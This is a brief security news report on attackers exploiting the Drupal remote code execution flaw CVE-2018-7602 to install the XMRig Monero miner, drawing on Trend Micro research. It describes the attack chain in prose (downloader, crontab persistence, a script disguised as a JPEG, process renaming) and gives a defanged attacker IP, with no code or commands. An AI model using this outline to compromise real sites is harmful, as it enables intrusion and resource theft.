Hackers are trying to exploit a recently patched Drupal flaw (CVE-2018-7602) to turn the affected system monero mining bots.
The CVE-2018-7602 also known as Drupalgeddon3 is remote code execution vulnerability affecting Drupal versions 7 and 8. The patch was released for flaw on April 25, 2018 by the company.
Security researchers at Trend Micro “were able to observe a series of network attacks exploiting CVE-2018-7602, a security flaw in the Drupal content management framework. For now, these attacks aim to turn affected systems into Monero-mining bots.”
By successfully exploitation of the flaw hackers can gain access to modify or delete the content of a Drupal-run site.
The attackers are using the vulnerability to download a shell script which retrieves an Executable and Linkable Format-based (ELF) downloader. The downloader will add then a crontab entry to update itself automatically.
The command is used to check the link from which it downloads and interprets a script named up.jpg posing as a JPEG file.
After that the ELF-based downloader also download a open-source XMRig (version 2.6.3) monero miner and install it on the device.
Once installed the miner will change the process name to [^$I$^] and access the file /tmp/dvir.pid. The attackers employs the HTTP 1.0 POST method to send data back in SEND_DATA() function.
“The attacks are notable for the precautions they took in that they hide behind the Tor network. We were able to follow the malware’s trail to 197[.]231[.]221[.]211. Based on WhoIs information, the IP segment 197[.]231[.]221[.]0[/]24 appears to belong to a virtual private network (VPN) provider. Additionally, we found that the IP address is a Tor exit node — gateways from where encrypted Tor traffic is passed to normal internet traffic.”
According to Trend Micro researchers they have blocked 810 attacks coming from this IP address in the past month and they don’t have enough to evidence to confirm whether all the attacks are related to monero mining payload.